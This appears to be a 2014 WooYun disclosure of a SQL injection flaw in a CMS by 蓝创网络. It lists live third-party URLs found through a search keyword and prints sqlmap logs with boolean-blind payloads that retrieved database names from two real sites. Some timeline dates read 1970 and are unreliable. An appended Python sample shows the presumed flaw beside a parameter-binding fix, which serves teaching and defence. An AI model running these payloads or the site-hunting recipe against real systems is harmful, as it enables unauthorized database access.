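Vulnerability summary

Bug ID: wooyun-2014-064953

Title: Generic SQL injection vulnerability in a business CMS

Vendor: 蓝创网络

Author: 泳少

Submitted: 2014-06-16 11:42

Fixed: 2014-06-21 11:42

Made public: 2014-06-21 11:42

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]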

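Vulnerability details

Disclosure status:

2014-06-16: Details reported to the vendor; awaiting vendor handling
1970-01-01: Vendor ignored the vulnerability; details opened to third-party security partners
1970-02-25: Details disclosed to core white hats and experts in related fields
1970-03-07: Details disclosed to regular white hats
1970-03-17: Details disclosed to trainee white hats
2014-06-21: Details disclosed to the public

Brief description:

RT /// Thanks for the divine guidance!

Detailed description:

Keyword: 技术支持:蓝创网络 ("Technical support: 蓝创网络")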

Then... I picked a few sites at random via Baidu.

I collected a few sites:

http://www.filteco.com/news_s.asp?id=11%27
http://www.dctennis.cn/news_c.php?id=210%27
http://www.laoxiangren.cn/news_c.php?id=48&cf=news%27
http://www.vazbrand.com/product_detail.asp?id=1222%27
http://www.fsfhad.com/news_c.php?id=326%27


Just a few!

Proof of vulnerability:

Then I used sqlmap to dump the databases of two of the sites.

D:\sqlmap>sqlmap.py -u "http://www.dctennis.cn/news_c.php?id=210" --dbs --current-user --current-db
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 21:51:35
[21:51:36] [INFO] using 'D:\sqlmap\output\www.dctennis.cn\session' as session file
[21:51:36] [INFO] testing connection to the target url
[21:51:36] [INFO] testing if the url is stable, wait a few seconds
[21:51:38] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[21:51:49] [INFO] testing if GET parameter 'id' is dynamic
[21:51:49] [INFO] confirming that GET parameter 'id' is dynamic
[21:51:50] [INFO] GET parameter 'id' is dynamic
[21:51:50] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[21:51:50] [INFO] testing sql injection on GET parameter 'id'
[21:51:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:51:56] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[21:51:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:51:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:51:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[21:51:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:51:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:51:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:51:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:52:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:52:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:52:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:52:06] [INFO] testing 'Oracle AND time-based blind'
[21:52:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:52:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:52:06] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=210' AND 7877=7877 AND 'XUCC'='XUCC
---
[21:52:09] [INFO] testing MySQL
[21:52:09] [INFO] confirming MySQL
[21:52:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL >= 5.0.2
[21:52:10] [INFO] fetching current user
[21:52:10] [INFO] retrieved: sqPdctdddds<%
current user: 'sqPdctdddds<%'
[21:53:10] [INFO] fetching current database
[21:53:10] [INFO] retrieved: sq_dctennis
current database: 'sq_dctennis'
[21:54:14] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[21:54:14] [INFO] fetching database names
[21:54:14] [INFO] fetching number of databases
[21:54:14] [INFO] retrieved:
[21:54:14] [ERROR] unable to retrieve the number of databases
[21:54:14] [INFO] falling back to current database
[21:54:14] [INFO] fetching current database
available databases [1]:
[*] sq_dctennis
[21:54:14] [INFO] Fetched data logged to text files under 'D:\sqlmap\output\www.dctennis.cn'
[*] shutting down at: 21:54:14


D:\sqlmap>sqlmap.py -u "http://www.laoxiangren.cn/news_c.php?id=48&cf=news" --dbs --current-user --current-db
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 21:52:05
[21:52:06] [INFO] using 'D:\sqlmap\output\www.laoxiangren.cn\session' as session file
[21:52:06] [INFO] testing connection to the target url
[21:52:08] [INFO] testing if the url is stable, wait a few seconds
[21:52:10] [INFO] url is stable
[21:52:10] [INFO] testing if GET parameter 'id' is dynamic
[21:52:10] [INFO] confirming that GET parameter 'id' is dynamic
[21:52:10] [INFO] GET parameter 'id' is dynamic
[21:52:10] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[21:52:10] [INFO] testing sql injection on GET parameter 'id'
[21:52:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:52:12] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[21:52:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:52:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:52:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[21:52:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:52:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:52:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:52:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:52:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:52:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:52:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:52:18] [INFO] testing 'Oracle AND time-based blind'
[21:52:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:52:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:52:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=48' AND 6123=6123 AND 'dGyf'='dGyf&cf=news
---
[21:52:24] [INFO] testing MySQL
[21:52:24] [INFO] confirming MySQL
[21:52:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL >= 5.0.2
[21:52:26] [INFO] fetching current user
[21:52:26] [INFO] retrieved: sqPddtxd2(1(<%
current user: 'sqPddtxd2(1(<%'
[21:53:09] [INFO] fetching current database
[21:53:09] [INFO] retrieved: sq_jhtxh2010
current database: 'sq_jhtxh2010'
[21:53:40] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[21:53:40] [INFO] fetching database names
[21:53:40] [INFO] fetching number of databases
[21:53:40] [INFO] retrieved:
[21:53:40] [ERROR] unable to retrieve the number of databases
[21:53:40] [INFO] falling back to current database
[21:53:40] [INFO] fetching current database
available databases [1]:
[*] sq_jhtxh2010
[21:53:40] [INFO] Fetched data logged to text files under 'D:\sqlmap\output\www.laoxiangren.cn'
[*] shutting down at: 21:53:40

Remediation:

You know what to do.

Copyright notice: when reposting, please credit the source 泳少@乌云
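
Added example, not part of the original report and not the vendor's code: the payload in the sqlmap log closes a quoted literal, which suggests the id parameter is concatenated into a WHERE clause. The Python code below uses sqlite3 as a stand-in for the PHP/MySQL stack and puts that presumed flaw next to a fix that allow-lists the parameter and binds it. The news table, its contents and all function names are hypothetical.

```python
import sqlite3

# Constructed sample data; table and column names are assumptions,
# since the report does not show the CMS schema or source code.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (210, 'Club news')")
    return db

def fetch_news_vulnerable(db, raw_id):
    # Presumed flaw: the id parameter is pasted inside a quoted literal,
    # so a single quote in the input ends the literal and the rest of
    # the input is parsed as SQL.
    sql = "SELECT title FROM news WHERE id = '" + raw_id + "'"
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # e.g. id=210' leaves an unbalanced quote

def fetch_news_fixed(db, raw_id):
    # Fix 1: allow-list the parameter as a short decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None
    # Fix 2: bind the value so it never becomes part of the SQL text.
    cur = db.execute("SELECT title FROM news WHERE id = ?", (int(raw_id),))
    return cur.fetchone()

def oracle(fetch, db, true_input, false_input):
    # Boolean-based blind injection only works if the response differs
    # between an injected TRUE condition and an injected FALSE one.
    return fetch(db, true_input) != fetch(db, false_input)

TRUE_INPUT = "210' AND 7877=7877 AND 'XUCC'='XUCC"   # payload from the sqlmap log
FALSE_INPUT = "210' AND 7877=7878 AND 'XUCC'='XUCC"  # constructed FALSE twin

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", oracle(fetch_news_vulnerable, db, TRUE_INPUT, FALSE_INPUT))
    print("fixed:", oracle(fetch_news_fixed, db, TRUE_INPUT, FALSE_INPUT))
```

With the fix in place both inputs are rejected before any query runs, so the response no longer depends on the injected condition.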


Vulnerability response

Vendor response:

Severity: No impact; ignored by vendor

Ignored at: 2014-06-21 11:42

Vendor reply:

Latest status:

None yet